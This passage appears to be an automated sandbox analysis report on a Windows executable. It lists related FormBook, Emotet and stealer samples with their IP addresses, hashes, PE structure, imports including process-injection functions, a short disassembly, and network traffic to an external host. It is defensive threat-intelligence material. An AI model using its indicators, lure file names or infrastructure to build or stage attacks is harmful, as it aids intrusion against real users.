                                                                                                            Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 81.2.196.19
                                                                                                            Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 81.2.196.19
                                                                                                            PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 81.2.196.19
                                                                                                            SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 81.2.196.19
                                                                                                            New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 81.2.196.19
                                                                                                            ExeFile (156).exeGet hashmaliciousEmotetBrowse
                                                                                                            • 81.2.235.111
                                                                                                            ExeFile (171).exeGet hashmaliciousEmotetBrowse
                                                                                                            • 81.2.235.111
                                                                                                            VvlYJBzLuW.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 194.182.83.4
                                                                                                            UDxMi3I3lO.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                                                                            • 81.2.194.105
                                                                                                            MULTIBAND-NEWHOPEUSrInvoiceCM60916_xlx.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 209.74.64.190
                                                                                                            NEW INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 209.74.64.190
                                                                                                            z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 209.74.64.190
                                                                                                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 209.74.95.29
                                                                                                            https://nassistenza-online.209-74-64-227.cprapid.com/Get hashmaliciousPhisherBrowse
                                                                                                            • 209.74.64.227
                                                                                                            rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • 209.74.64.189
                                                                                                            SEY4MER_SWIFT0002_3U782_AKI3892_475_3Y54_N023_3U987_08HNF_ADM48.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 209.74.95.146
                                                                                                            SEY4MER_SWIFT0002_3U782_AKI3892_475_3Y54_N023_3U987_08HNF_ADM48.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 209.74.95.146
                                                                                                            PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 209.74.95.29
                                                                                                            PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 209.74.95.29
                                                                                                            No context
                                                                                                            No context
Process: C:\Windows\SysWOW64\replace.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1221538113908904
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5: C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1: 6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256: CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512: 01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious: false
Reputation: moderate, very likely benign file
Process: C:\Users\user\Desktop\YSjOEAta07.exe
File Type: data
Category: dropped
Size (bytes): 287232
Entropy (8bit): 7.994512677072538
Encrypted: true
SSDEEP: 6144:SvAhJSAs1Tc4xXLLyPadwLsQH6wIFB73l6QkNQto:8aJSJKYyCdwLfH6wIFBl6N+q
MD5: 4A0AA9913F618FF11D3CE4AB70A79731
SHA1: AFE629C4A49A17BCCC4FC896865ECFDDE8D1B20E
SHA-256: 577900974A0BD42F40C89E16D8A4FBD98BA0BE228AFA15BCF369884953195902
SHA-512: 62D55B65B3D3651B4F6A8CF5A314E6CBD2B604E100409975FE98740BC0348197BAF1CC0A75322EEEE771DDC910F861620BBBE51E685DAE9F9D36A3F7B6F17370
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.541545770077006
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: YSjOEAta07.exe
File size: 1'361'945 bytes
MD5: eb0f7c655c78976889355aa35a43dd38
SHA1: 42238019d0febe523faa8b9d851292090ac9a409
SHA256: a16c70f7334f2e73756ea3dc716d70edaf138185d83289bcff6d65d43801408e
SHA512: f56f4857af14bb282a64b15c25bb545fa7ef2c4cfed23d98475a3bdafb4eb36d866404dcfed8e23532ae2acf7907dad6e5e0b74f1a87a2a1313c14f97289a7a0
SSDEEP: 24576:uRmJkcoQricOIQxiZY1iaCPKLNrPbDyvCQJ+A5w1DdBXuZMRHUmA:7JZoQrbTFZY1iaCPKJr6/+A5wxdBXuZt
TLSH: A555F222B5D69076C2B327B19E7EF76A963D79360327D1DB23C42D325EA00416B29733
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
Icon Hash: 1733312925935517
Entrypoint: 0x4165c1
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                                                            Instruction
                                                                                                            call 00007F1804E9CE9Bh
                                                                                                            jmp 00007F1804E93D0Eh
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            int3
                                                                                                            push ebp
                                                                                                            mov ebp, esp
                                                                                                            push edi
                                                                                                            push esi
                                                                                                            mov esi, dword ptr [ebp+0Ch]
                                                                                                            mov ecx, dword ptr [ebp+10h]
                                                                                                            mov edi, dword ptr [ebp+08h]
                                                                                                            mov eax, ecx
                                                                                                            mov edx, ecx
                                                                                                            add eax, esi
                                                                                                            cmp edi, esi
                                                                                                            jbe 00007F1804E93E8Ah
                                                                                                            cmp edi, eax
                                                                                                            jc 00007F1804E94026h
                                                                                                            cmp ecx, 00000080h
                                                                                                            jc 00007F1804E93E9Eh
                                                                                                            cmp dword ptr [004A9724h], 00000000h
                                                                                                            je 00007F1804E93E95h
                                                                                                            push edi
                                                                                                            push esi
                                                                                                            and edi, 0Fh
                                                                                                            and esi, 0Fh
                                                                                                            cmp edi, esi
                                                                                                            pop esi
                                                                                                            pop edi
                                                                                                            jne 00007F1804E93E87h
                                                                                                            jmp 00007F1804E94262h
                                                                                                            test edi, 00000003h
                                                                                                            jne 00007F1804E93E96h
                                                                                                            shr ecx, 02h
                                                                                                            and edx, 03h
                                                                                                            cmp ecx, 08h
                                                                                                            jc 00007F1804E93EABh
                                                                                                            rep movsd
                                                                                                            jmp dword ptr [00416740h+edx*4]
                                                                                                            mov eax, edi
                                                                                                            mov edx, 00000003h
                                                                                                            sub ecx, 04h
                                                                                                            jc 00007F1804E93E8Eh
                                                                                                            and eax, 03h
                                                                                                            add ecx, eax
                                                                                                            jmp dword ptr [00416654h+eax*4]
                                                                                                            jmp dword ptr [00416750h+ecx*4]
                                                                                                            nop
                                                                                                            jmp dword ptr [004166D4h+ecx*4]
                                                                                                            nop
                                                                                                            inc cx
                                                                                                            add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                            inc cx
                                                                                                            add byte ptr [ebx], ah
                                                                                                            ror dword ptr [edx-75F877FAh], 1
                                                                                                            inc esi
                                                                                                            add dword ptr [eax+468A0147h], ecx
                                                                                                            add al, cl
                                                                                                            jmp 00007F180730C687h
                                                                                                            add esi, 03h
                                                                                                            add edi, 03h
                                                                                                            cmp ecx, 08h
                                                                                                            jc 00007F1804E93E4Eh
                                                                                                            rep movsd
                                                                                                            jmp dword ptr [00000000h+edx*4]
                                                                                                            Programming Language:
                                                                                                            • [ C ] VS2010 SP1 build 40219
                                                                                                            • [C++] VS2010 SP1 build 40219
                                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                            • [ASM] VS2010 SP1 build 40219
                                                                                                            • [RES] VS2010 SP1 build 40219
                                                                                                            • [LNK] VS2010 SP1 build 40219

| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| --- | --- | --- | --- | --- | --- | --- |
| RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974 |
| RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689 |
| RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919 |
| RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474 |
| RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856 |
| RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445 |
| RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021 |
| RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758 |
| RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702 |
| RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9 |
| RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508 |
| RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976 |
| RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713 |
| RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365 |
| RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
| RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336 |
| RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531 |
| RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186 |
| RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939 |
| RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718 |
| RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581 |

| DLL | Import |
| --- | --- |
| WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv |
| VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW |
| WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
| COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy |
| MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW |
| WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable |
| PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules |
| USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW |
| KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA |
| USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId |
| GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo |
| COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW |
| ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey |
| SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish |
| ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString |
| OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit |

| Language of compilation system | Country where language is spoken | Map |
| --- | --- | --- |
| English | Great Britain | |
| English | United States | |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                            Oct 7, 2024 15:55:43.906821012 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:43.906958103 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:43.917706013 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:43.922595978 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.195699930 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.195714951 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.195806980 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.195811987 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.195892096 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.197782993 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.214982986 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.215013981 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.215064049 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.215130091 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.241277933 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.241293907 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.241305113 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.241312027 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.241395950 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.258841038 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.258989096 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.259090900 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.285329103 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.285377026 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.285536051 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.314374924 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.314443111 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.314480066 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.314503908 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.314512968 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.314551115 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.314591885 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.315711975 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.315749884 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.315777063 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.322578907 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.322643042 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.325059891 CEST804998194.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:45.326561928 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:45.428571939 CEST4998180192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:46.458853960 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:46.463856936 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:46.463964939 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:46.541456938 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:46.546432018 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:46.546478033 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.854372978 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.854409933 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.854422092 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.854762077 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.877697945 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.877857924 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.877868891 CEST804998294.73.146.114192.168.2.9
                                                                                                            Oct 7, 2024 15:55:47.877890110 CEST4998280192.168.2.994.73.146.114
                                                                                                            Oct 7, 2024 15:55:47.878012896 CEST4998280192.168.2.994.73.146.114
